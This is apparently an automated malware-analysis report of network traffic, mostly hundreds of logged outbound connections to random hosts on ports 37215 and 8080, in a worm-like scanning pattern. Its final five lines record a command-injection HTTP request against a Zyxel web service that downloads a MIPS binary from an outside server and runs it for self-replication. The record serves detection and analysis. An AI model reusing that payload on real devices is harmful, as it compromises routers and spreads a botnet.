          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.158.255.13:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.236.22.169:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 141.68.74.219:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 151.75.136.105:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.83.228.77:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.144.105.68:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.164.240.104:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 64.70.210.50:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.184.208.145:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.170.50.116:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 191.107.151.57:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.92.109.98:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 124.179.144.50:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 149.44.110.55:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.240.142.116:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.233.101.146:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 167.186.208.30:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.34.88.170:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 159.149.135.221:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 12.4.109.252:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.79.226.92:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.105.217.194:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 82.171.54.67:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.219.27.95:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 143.17.143.90:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.37.105.16:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.137.3.250:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.191.162.198:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.192.80.243:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.111.94.150:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.99.152.208:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 76.254.56.116:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.206.97.16:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.242.29.65:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.240.81.37:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 199.198.208.226:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.125.219.108:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 23.90.138.6:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.59.75.229:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.1.33.7:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 90.85.15.100:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 14.187.115.32:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 199.167.5.53:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 123.13.137.2:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.243.6.139:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.189.190.12:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.238.72.85:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 110.87.205.47:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 64.9.103.160:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.35.224.253:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.138.100.203:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.251.131.18:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.247.61.136:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.186.63.184:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 92.58.184.100:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.46.222.167:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.32.170.213:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.74.240.232:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.251.220.188:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.194.128.207:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.181.29.250:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.159.220.202:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.132.163.250:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.79.119.97:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 181.227.226.165:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.24.244.66:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.95.124.238:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.193.107.205:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 82.104.191.196:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.201.209.12:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.4.14.206:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 85.63.244.247:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.18.18.92:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 148.219.111.33:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.6.121.17:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.220.67.176:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.199.131.30:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.95.175.155:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 48.12.65.67:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 71.145.152.139:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.21.129.237:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.216.200.96:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 146.25.40.57:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 84.74.97.179:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 139.154.48.26:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 148.24.150.118:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.4.163.205:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.240.166.20:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 205.218.186.110:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 177.32.254.216:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 9.52.204.216:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.183.177.246:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.26.182.18:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.4.244.182:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.93.110.110:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 157.153.128.50:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 17.235.118.5:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 41.59.73.118:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 200.234.11.105:37215
          Source: global trafficTCP traffic: 192.168.2.13:53910 -> 197.207.198.101:37215
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 8.63.214.39:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 159.164.72.145:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 94.207.239.140:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 81.105.155.45:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 195.184.58.140:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 114.70.102.94:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 2.247.181.92:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 59.189.119.16:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 97.82.193.154:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 78.80.0.211:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 53.93.130.221:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 4.223.131.40:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 52.10.60.197:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 174.224.20.159:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 223.1.12.211:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 36.49.84.134:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 5.192.223.65:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 118.241.197.110:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 60.233.159.48:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 166.192.219.219:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 157.161.13.125:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 2.165.120.44:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 120.119.55.96:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 67.42.66.45:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 149.243.250.105:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 190.113.0.61:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 50.225.218.6:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 51.223.244.160:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 78.143.241.100:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 81.183.59.27:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 57.21.6.168:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 179.231.16.221:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 66.136.83.242:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 223.42.197.168:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 81.224.123.91:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 211.217.3.2:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 88.180.86.17:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 67.239.223.144:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 89.0.134.112:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 123.2.195.80:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 35.19.215.253:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 51.128.138.192:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 206.91.239.96:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 206.138.168.77:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 98.195.110.82:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 148.196.80.1:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 176.230.170.192:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 156.19.173.113:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 164.23.28.209:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 20.238.96.142:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 94.143.190.65:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 66.225.220.94:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 217.198.217.151:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 92.207.173.17:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 129.89.57.9:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 125.198.250.49:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 83.1.164.239:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 198.240.252.223:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 133.111.35.87:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 77.222.104.63:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 130.104.8.179:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 96.20.238.127:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 143.85.216.31:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 154.137.56.156:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 198.53.16.171:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 12.173.4.92:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 216.252.151.11:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 168.192.162.238:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 158.214.102.177:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 71.170.175.92:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 196.180.24.214:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 122.102.45.180:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 92.77.203.249:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 59.113.224.126:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 47.155.33.129:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 170.188.153.59:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 210.43.114.19:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 93.40.129.2:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 50.32.252.154:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 145.213.214.114:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 63.207.54.143:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 159.10.152.4:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 146.154.72.65:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 72.66.124.176:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 51.1.128.93:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 161.80.60.138:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 86.239.142.59:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 103.169.178.180:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 173.67.253.109:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 49.127.142.83:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 196.134.31.218:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 91.88.114.159:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 116.147.192.167:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 101.172.65.29:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 50.200.223.185:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 135.208.183.163:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 203.32.200.71:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 59.37.246.140:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 155.17.198.253:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 210.179.153.209:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 186.252.129.51:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 155.108.41.186:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 210.217.201.3:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 45.121.244.33:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 113.78.72.62:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 117.243.129.163:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 81.66.253.99:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 190.253.20.35:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 121.67.16.237:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 31.70.23.27:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 39.49.131.112:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 110.85.223.59:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 145.35.230.176:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 37.167.161.193:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 63.34.162.37:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 88.163.132.170:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 190.181.37.113:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 77.99.216.146:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 175.208.116.230:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 152.127.143.159:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 207.15.46.80:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 49.250.64.123:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 153.193.163.66:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 195.234.81.146:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 62.93.37.37:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 103.136.190.181:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 140.153.41.154:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 106.100.134.84:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 184.233.199.64:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 39.21.143.186:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 213.182.193.210:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 60.215.150.91:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 64.97.133.90:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 73.49.45.167:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 142.70.210.59:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 40.5.233.217:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 106.2.170.95:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 93.83.165.223:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 220.154.78.8:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 103.167.103.21:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 115.29.225.70:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 77.169.171.9:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 119.150.101.151:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 72.95.239.36:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 219.138.45.145:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 49.118.165.251:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 207.194.44.6:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 94.47.234.30:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 128.181.235.144:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 161.20.239.9:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 139.130.239.37:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 18.174.131.70:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 115.12.193.18:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 199.224.56.246:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 207.42.65.198:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 130.223.229.147:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 34.214.206.109:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 39.142.221.69:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 85.14.29.72:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 181.195.214.118:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 179.142.151.103:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 81.153.222.56:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 83.198.81.185:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 141.2.18.45:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 205.158.255.109:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 150.20.104.213:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 194.149.119.221:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 146.37.140.26:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 100.7.147.226:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 32.51.128.141:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 49.75.115.118:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 104.78.122.8:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 121.59.3.171:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 115.153.73.211:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 69.39.216.191:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 75.47.103.142:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 146.8.38.253:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 218.97.66.92:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 9.243.204.135:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 66.122.85.184:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 94.136.32.151:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 35.98.140.138:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 5.67.26.224:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 142.219.9.10:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 209.227.120.111:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 17.74.57.117:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 39.251.75.3:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 171.121.173.174:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 199.135.235.128:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 59.172.115.149:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 47.59.240.189:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 183.156.150.88:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 89.61.43.82:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 53.226.170.112:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 153.103.179.42:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 196.189.215.60:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 124.169.49.201:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 142.50.38.150:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 36.220.42.177:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 37.209.76.113:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 126.28.171.196:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 88.136.230.204:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 24.97.244.228:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 84.94.184.204:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 223.73.209.74:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 66.203.176.28:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 86.41.43.148:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 216.69.206.98:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 109.245.57.244:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 79.79.12.7:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 134.50.146.117:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 125.236.149.184:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 209.236.165.35:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 4.77.183.128:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 159.236.150.204:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 36.140.73.184:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 131.82.59.140:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 122.252.226.161:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 99.86.1.182:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 80.99.18.63:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 122.189.89.48:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 72.65.254.251:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 39.198.204.29:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 204.184.54.173:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 67.212.35.105:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 87.169.17.12:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 173.208.225.236:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 155.215.84.182:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 221.137.79.46:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 183.158.62.122:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 216.70.74.41:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 185.105.51.254:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 181.159.47.150:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 106.231.89.105:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 44.161.218.122:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 23.204.242.210:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 40.162.96.87:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 173.197.215.55:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 108.114.75.139:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 216.28.112.118:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 132.120.156.157:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 88.142.244.238:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 156.182.109.42:8080
          Source: global trafficTCP traffic: 192.168.2.13:55702 -> 49.229.235.147:8080
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
